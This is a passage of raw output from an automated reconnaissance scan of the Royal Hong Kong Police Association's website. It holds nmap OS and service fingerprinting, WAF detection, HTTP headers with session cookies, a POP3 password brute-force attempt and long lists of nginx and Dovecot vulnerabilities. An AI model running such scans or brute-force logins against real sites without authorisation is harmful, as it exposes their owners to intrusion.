1041| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
1042| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
1043| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
1044| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
1045|
1046| OSVDB - http://www.osvdb.org:
1047| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
1048| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
1049| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
1050| [92796] nginx ngx_http_close_connection Function Crafted r->
1051| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
1052| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
1053| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
1054| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
1055| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
1056| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
1057| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
1058| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
1059| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
1060| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
1061| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
1062| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
1063| [62617] nginx Internal DNS Cache Poisoning Weakness
1064| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
1065| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
1066| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
1067| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
1068| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
1069| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
1070| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
1071| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
1072| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
1073| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
1074|_
1075Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1076Aggressive OS guesses: Linux 2.6.32 (97%), Linux 2.6.32 or 3.10 (97%), Linux 2.6.35 (97%), Linux 3.4 (97%), Linux 3.5 (97%), Linux 3.7 (97%), Linux 4.2 (97%), Linux 4.4 (97%), Synology DiskStation Manager 5.1 (97%), WatchGuard Fireware 11.8 (97%)
1077No exact OS matches for host (test conditions non-ideal).
1078Uptime guess: 7.435 days (since Wed Sep 25 03:04:48 2019)
1079TCP Sequence Prediction: Difficulty=258 (Good luck!)
1080IP ID Sequence Generation: All zeros
1081
1082TRACEROUTE
1083HOP RTT ADDRESS
10841 92.25 ms box6011.bluehost.com (216.172.168.193)
1085
1086NSE: Script Post-scanning.
1087Initiating NSE at 13:30
1088Completed NSE at 13:30, 0.00s elapsed
1089Initiating NSE at 13:30
1090Completed NSE at 13:30, 0.00s elapsed
1091Read data files from: /usr/bin/../share/nmap
1092OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1093Nmap done: 1 IP address (1 host up) scanned in 618.84 seconds
1094 Raw packets sent: 83 (7.456KB) | Rcvd: 17 (1.400KB)
1095[92m====================================================================================[0m
1096[91m CHECKING FOR WAF [0m
1097[92m====================================================================================[0m
1098
1099 [1;97m______
1100 [1;97m/ \
1101 [1;97m( Woof! )
1102 [1;97m\______/ [1;91m)
1103 [1;97m,, [1;91m) ([1;93m_
1104 [1;93m.-. [1;97m- [1;92m_______ [1;91m( [1;93m|__|
1105 [1;93m()``; [1;92m|==|_______) [1;91m.)[1;93m|__|
1106 [1;93m/ (' [1;92m/|\ [1;91m( [1;93m|__|
1107 [1;93m( / ) [1;92m / | \ [1;91m. [1;93m|__|
1108 [1;93m\(_)_)) [1;92m/ | \ [1;93m|__|[0m
1109
1110 WAFW00F - Web Application Firewall Detection Tool
1111
1112
1113Checking http://www.rhkpa.org
1114The site http://www.rhkpa.org is behind ModSecurity (SpiderLabs) WAF.
1115Number of requests: 5
1116
1117[92m====================================================================================[0m
1118[91m GATHERING HTTP INFO [0m
1119[92m====================================================================================[0m
1120[1m[34mhttp://www.rhkpa.org[0m [301 Moved Permanently] [1m[37mCookies[0m[[37mMAILPOET_SESSION,PHPSESSID,pmpro_visit[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTTPServer[0m[[1m[36mnginx/1.14.1[0m], [1m[37mIP[0m[[37m216.172.168.193[0m], [1m[37mRedirectLocation[0m[[37mhttps://www.rhkpa.org/[0m], [1m[37mUncommonHeaders[0m[[37mx-redirect-by,x-server-cache,x-proxy-cache[0m], [1m[37mnginx[0m[[1m[32m1.14.1[0m]
1121[1m[34mhttps://www.rhkpa.org/[0m [200 OK] [1m[37mCookies[0m[[37mMAILPOET_SESSION,PHPSESSID,pmpro_visit[0m], [1m[37mCountry[0m[[37mUNITED STATES[0m][[1m[31mUS[0m], [1m[37mHTML5[0m, [1m[37mHTTPServer[0m[[1m[36mnginx/1.14.1[0m], [1m[37mIP[0m[[37m216.172.168.193[0m], [1m[37mJQuery[0m[[1m[32m5.2.3[0m], [1m[37mMetaGenerator[0m[[37mWordPress Download Manager 3.0.2[0m], [1m[37mPoweredBy[0m[[37mPaid[0m], [1m[37mScript[0m[[37mtext/javascript[0m], [1m[37mTitle[0m[[1m[33mRHKPA | Royal Hong Kong Police Association[0m], [1m[37mUncommonHeaders[0m[[37mlink,x-et-api-version,x-et-api-root,x-et-api-origin,x-tec-api-version,x-tec-api-root,x-tec-api-origin,x-server-cache,x-proxy-cache[0m], [1m[37mWordPress[0m, [1m[37mnginx[0m[[1m[32m1.14.1[0m]
1122[92m====================================================================================[0m
1123[91m GATHERING SERVER INFO [0m
1124[92m====================================================================================[0m
1125
1126wig - WebApp Information Gatherer
1127
1128
1129[92m====================================================================================[0m
1130[91m CHECKING HTTP HEADERS [0m
1131[92m====================================================================================[0m
1132HTTP/1.1 301 Moved Permanently
1133Server: nginx/1.14.1
1134Date: Wed, 02 Oct 2019 13:32:12 GMT
1135Content-Type: text/html; charset=UTF-8
1136Connection: keep-alive
1137Expires: Thu, 19 Nov 1981 08:52:00 GMT
1138Cache-Control: no-store, no-cache, must-revalidate
1139Pragma: no-cache
1140X-Redirect-By: WordPress
1141Set-Cookie: PHPSESSID=i0mvq3jo8i9jo2ef36eqonivo5; path=/
1142Set-Cookie: MAILPOET_SESSION=%221dnmh46dbchwk0k4ks400swkokoggcwo%22; expires=Thu, 03-Oct-2019 13:02:12 GMT; Max-Age=84600; path=/
1143Set-Cookie: pmpro_visit=1; path=/
1144Location: https://www.rhkpa.org/
1145
1146HTTP/1.1 301 Moved Permanently
1147Server: nginx/1.14.1
1148Date: Wed, 02 Oct 2019 13:32:14 GMT
1149Content-Type: text/html; charset=UTF-8
1150Connection: keep-alive
1151Expires: Thu, 19 Nov 1981 08:52:00 GMT
1152Cache-Control: no-store, no-cache, must-revalidate
1153Pragma: no-cache
1154X-Redirect-By: WordPress
1155Set-Cookie: PHPSESSID=7csgg38u71l0bbuernd5uo8f33; path=/
1156Set-Cookie: MAILPOET_SESSION=%227x43h992ngws8owkc848gcogc08c0sc8%22; expires=Thu, 03-Oct-2019 13:02:14 GMT; Max-Age=84600; path=/
1157Set-Cookie: pmpro_visit=1; path=/
1158Location: https://www.rhkpa.org/
1159
1160[92m====================================================================================[0m
1161[91m GATHERING WEB FINGERPRINT [0m
1162[92m====================================================================================[0m
1163 jQuery Migrate
1164 WooCommerce 3.7.0
1165 WordPress
1166 Bootstrap
1167 jQuery 1.12.4
1168 Nginx 1.14.1
1169 Google Font API
1170 X-ET-API-VERSION: v1
1171 X-ET-API-ROOT: https://www.rhkpa.org/wp-json/tribe/tickets/v1/
1172 X-ET-API-ORIGIN: https://www.rhkpa.org
1173 X-TEC-API-VERSION: v1
1174 X-TEC-API-ROOT: https://www.rhkpa.org/wp-json/tribe/events/v1/
1175 X-TEC-API-ORIGIN: https://www.rhkpa.org
1176 X-Server-Cache: false
1177[92m====================================================================================[0m
1178[91m DISPLAYING META GENERATOR TAGS [0m
1179[92m====================================================================================[0m
1180[92m====================================================================================[0m
1181[91m DISPLAYING COMMENTS [0m
1182[92m====================================================================================[0m
1183[92m====================================================================================[0m
1184[91m DISPLAYING SITE LINKS [0m
1185[92m====================================================================================[0m
1186[92m====================================================================================[0m
1187[91m SAVING SCREENSHOTS [0m
1188[92m====================================================================================[0m
1189webscreenshot.py version 2.2.1
1190
1191[+] 1 URLs to be screenshot
1192[ERROR][http://www.rhkpa.org:80] renderer binary could not have been found in your current PATH environment variable, exiting
1193[+] 0 actual URLs screenshot
1194[+] 1 error(s)
1195 http://www.rhkpa.org:80
1196[93m + -- --=[Port 110 opened... running tests...[0m
1197[92m====================================================================================[0m
1198[91m RUNNING NMAP SCRIPTS [0m
1199[92m====================================================================================[0m
1200Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-02 13:32 UTC
1201Nmap scan report for www.rhkpa.org (216.172.168.193)
1202Host is up (0.13s latency).
1203rDNS record for 216.172.168.193: box6011.bluehost.com
1204
1205PORT STATE SERVICE VERSION
1206110/tcp open pop3 Dovecot pop3d
1207| pop3-brute:
1208| Accounts: No valid accounts found
1209| Statistics: Performed 252 guesses in 219 seconds, average tps: 1.2
1210|_ ERROR: Failed to connect.
1211|_pop3-capabilities: USER RESP-CODES UIDL STLS AUTH-RESP-CODE CAPA SASL(PLAIN LOGIN) TOP PIPELINING
1212| vulscan: VulDB - https://vuldb.com:
1213| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
1214| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
1215| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
1216| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
1217| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
1218| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
1219| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
1220| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
1221| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
1222| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
1223| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
1224| [69835] Dovecot 2.2.0/2.2.1 denial of service
1225| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
1226| [65684] Dovecot up to 2.2.6 unknown vulnerability
1227| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
1228| [63692] Dovecot up to 2.0.15 spoofing
1229| [7062] Dovecot 2.1.10 mail-search.c denial of service
1230| [57517] Dovecot up to 2.0.12 Login directory traversal
1231| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
1232| [57515] Dovecot up to 2.0.12 Crash denial of service
1233| [54944] Dovecot up to 1.2.14 denial of service
1234| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
1235| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
1236| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
1237| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
1238| [53277] Dovecot up to 1.2.10 denial of service
1239| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
1240| [45256] Dovecot up to 1.1.5 directory traversal
1241| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
1242| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
1243| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
1244| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
1245| [40356] Dovecot 1.0.9 Cache unknown vulnerability
1246| [38222] Dovecot 1.0.2 directory traversal
1247| [36376] Dovecot up to 1.0.x directory traversal
1248| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
1249|
1250| MITRE CVE - https://cve.mitre.org:
1251| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
1252| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
1253| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
1254| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
1255| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
1256| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
1257| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
1258| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
1259| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
1260| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
1261| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
1262| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
1263| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
1264| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
1265| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
1266| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
1267| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
1268| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
1269| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
1270| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
1271| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
1272| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
1273| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
1274| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
1275| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
1276| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
1277| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
1278| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
1279| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
1280| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
1281| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
1282| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
1283| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
1284| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
1285| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
1286| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
1287| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
1288|
1289| SecurityFocus - https://www.securityfocus.com/bid/:
1290| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
1291| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
1292| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
1293| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
1294| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
1295| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
1296| [67306] Dovecot Denial of Service Vulnerability
1297| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
1298| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
1299| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
1300| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
1301| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
1302| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
1303| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
1304| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
1305| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
1306| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
1307| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
1308| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
1309| [39838] tpop3d Remote Denial of Service Vulnerability
1310| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
1311| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
1312| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
1313| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
1314| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
1315| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
1316| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
1317| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
1318| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
1319| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
1320| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
1321| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
1322| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
1323| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
1324| [17961] Dovecot Remote Information Disclosure Vulnerability
1325| [16672] Dovecot Double Free Denial of Service Vulnerability
1326| [8495] akpop3d User Name SQL Injection Vulnerability
1327| [8473] Vpop3d Remote Denial Of Service Vulnerability
1328| [3990] ZPop3D Bad Login Logging Failure Vulnerability
1329| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
1330|
1331| IBM X-Force - https://exchange.xforce.ibmcloud.com:
1332| [86382] Dovecot POP3 Service denial of service
1333| [84396] Dovecot IMAP APPEND denial of service
1334| [80453] Dovecot mail-search.c denial of service
1335| [71354] Dovecot SSL Common Name (CN) weak security
1336| [67675] Dovecot script-login security bypass
1337| [67674] Dovecot script-login directory traversal
1338| [67589] Dovecot header name denial of service
1339| [63267] Apple Mac OS X Dovecot information disclosure
1340| [62340] Dovecot mailbox security bypass
1341| [62339] Dovecot IMAP or POP3 denial of service
1342| [62256] Dovecot mailbox security bypass
1343| [62255] Dovecot ACL entry security bypass
1344| [60639] Dovecot ACL plugin weak security
1345| [57267] Apple Mac OS X Dovecot Kerberos security bypass
1346| [56763] Dovecot header denial of service
1347| [54363] Dovecot base_dir privilege escalation
1348| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
1349| [46323] Dovecot dovecot.conf information disclosure
1350| [46227] Dovecot message parsing denial of service
1351| [45669] Dovecot ACL mailbox security bypass
1352| [45667] Dovecot ACL plugin rights security bypass
1353| [41085] Dovecot TAB characters authentication bypass
1354| [41009] Dovecot mail_extra_groups option unauthorized access
1355| [39342] Dovecot LDAP auth cache configuration security bypass
1356| [35767] Dovecot ACL plugin security bypass
1357| [34082] Dovecot mbox-storage.c directory traversal
1358| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
1359| [26578] Cyrus IMAP pop3d buffer overflow
1360| [26536] Dovecot IMAP LIST information disclosure
1361| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
1362| [24709] Dovecot APPEND command denial of service
1363| [13018] akpop3d authentication code SQL injection
1364| [7345] Slackware Linux imapd and ipop3d core dump
1365| [6269] imap, ipop2d and ipop3d buffer overflows
1366| [5923] Linuxconf vpop3d symbolic link
1367| [4918] IPOP3D, Buffer overflow attack
1368| [1560] IPOP3D, user login successful
1369| [1559] IPOP3D user login to remote host successful
1370| [1525] IPOP3D, user logout
1371| [1524] IPOP3D, user auto-logout
1372| [1523] IPOP3D, user login failure
1373| [1522] IPOP3D, brute force attack
1374| [1521] IPOP3D, user kiss of death logout
1375| [418] pop3d mktemp creates insecure temporary files
1376|
1377| Exploit-DB - https://www.exploit-db.com:
1378| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
1379| [23053] Vpop3d Remote Denial of Service Vulnerability
1380| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
1381| [11893] tPop3d 1.5.3 DoS
1382| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
1383| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
1384| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
1385| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
1386|
1387| OpenVAS (Nessus) - http://www.openvas.org:
1388| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
1389| [901025] Dovecot Version Detection
1390| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
1391| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
1392| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
1393| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
1394| [870607] RedHat Update for dovecot RHSA-2011:0600-01
1395| [870471] RedHat Update for dovecot RHSA-2011:1187-01
1396| [870153] RedHat Update for dovecot RHSA-2008:0297-02
1397| [863272] Fedora Update for dovecot FEDORA-2011-7612
1398| [863115] Fedora Update for dovecot FEDORA-2011-7258
1399| [861525] Fedora Update for dovecot FEDORA-2007-664
1400| [861394] Fedora Update for dovecot FEDORA-2007-493
1401| [861333] Fedora Update for dovecot FEDORA-2007-1485
1402| [860845] Fedora Update for dovecot FEDORA-2008-9202
1403| [860663] Fedora Update for dovecot FEDORA-2008-2475
1404| [860169] Fedora Update for dovecot FEDORA-2008-2464
1405| [860089] Fedora Update for dovecot FEDORA-2008-9232
1406| [840950] Ubuntu Update for dovecot USN-1295-1
1407| [840668] Ubuntu Update for dovecot USN-1143-1
1408| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
1409| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
1410| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
1411| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
1412| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
1413| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
1414| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
1415| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
1416| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
1417| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
1418| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
1419| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
1420| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
1421| [70259] FreeBSD Ports: dovecot
1422| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
1423| [66522] FreeBSD Ports: dovecot
1424| [65010] Ubuntu USN-838-1 (dovecot)
1425| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
1426| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
1427| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
1428| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
1429| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
